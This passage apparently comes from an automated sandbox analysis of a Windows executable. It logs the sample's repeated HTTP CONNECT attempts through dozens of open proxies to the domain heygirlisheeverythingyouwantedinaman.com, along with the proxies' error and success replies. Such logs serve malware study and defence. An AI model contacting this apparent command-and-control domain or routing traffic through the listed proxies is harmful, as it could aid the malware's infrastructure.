                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
                                                                                                      Feb 23, 2024 09:45:33.127233028 CET295INData Raw: 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72
                                                                                                      Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at heygirlisheeverythingyo


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1683192.168.2.45462334.83.143.631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.247987032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.110182047 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1684192.168.2.45472445.177.80.21010806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.248262882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1685192.168.2.454722221.6.139.19090026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.273211002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.605933905 CET311INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:30 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1686192.168.2.45476282.113.157.122312806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.284924984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1687192.168.2.454736125.228.143.20741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.285036087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1688192.168.2.45475734.95.243.12280816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.286660910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.862025976 CET59INHTTP/1.1 200 Connection Established
                                                                                                      Proxy-agent: nginx


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1689192.168.2.454725103.49.202.252806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.286895990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.661168098 CET343INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                      Date: Fri, 23 Feb 2024 08:45:30 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 182
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1690192.168.2.45461320.205.61.143806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.287012100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.589632034 CET319INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:30 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 17
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      X-Cache: MISS from cdn-fintech.info
                                                                                                      X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                      Connection: keep-alive
                                                                                                      Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                      Data Ascii: ERR_ACCESS_DENIED


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1691192.168.2.454738124.70.78.15780006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.287240982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1692192.168.2.454737123.30.154.17177776812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.287533045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.627137899 CET343INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.10.3 (Ubuntu)
                                                                                                      Date: Fri, 23 Feb 2024 08:45:30 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 182
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1693192.168.2.454008154.239.9.9480806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.287581921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.365797043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.475684881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.475439072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:54.490500927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:06.506154060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:18.553093910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1694192.168.2.454782104.16.108.204806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.287636995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.374802113 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:30 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1695192.168.2.454740125.122.26.24210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.287904024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1696192.168.2.45476165.20.216.19980806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.304147005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1697192.168.2.454778162.241.40.187415016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.304354906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.697079897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.061234951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.834645033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.317095041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1698192.168.2.454614103.159.194.15177776812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.347544909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1699192.168.2.453996103.144.18.13720026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.403954983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1700192.168.2.45477952.236.0.680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.406107903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.279433966 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1701192.168.2.454029191.37.155.13556786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.406107903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1702192.168.2.454645181.224.205.429996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.414093018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.443859100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.538089037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1703192.168.2.45481543.153.55.2054436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.450083017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1704192.168.2.453973113.204.4.142108006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.451095104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1705192.168.2.454666142.54.228.19341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.454982996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1706192.168.2.454783185.158.114.14265866812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.488789082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1707192.168.2.454763103.118.46.17480806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.497952938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1708192.168.2.45287751.15.240.207163796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.499938965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.683363914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.865829945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1709192.168.2.454787201.184.159.2856786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.500019073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1710192.168.2.452889194.163.159.93460216812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.500179052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.683363914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.865803957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.865832090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:54.865518093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:06.865526915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1711192.168.2.454791192.252.216.8141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.515352011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1712192.168.2.452872145.239.2.102421476812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.519494057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.647030115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.647262096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1713192.168.2.452878162.214.191.248483466812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.522593975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.647051096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.647260904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1714192.168.2.454641103.242.119.88806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.555478096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.884979963 CET629INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Date: Fri, 23 Feb 2024 08:45:30 GMT
                                                                                                      Server: Apache
                                                                                                      Proxy-Authenticate: Basic realm="Authorization"
                                                                                                      Content-Length: 415
                                                                                                      Content-Type: text/html; charset=iso-8859-1
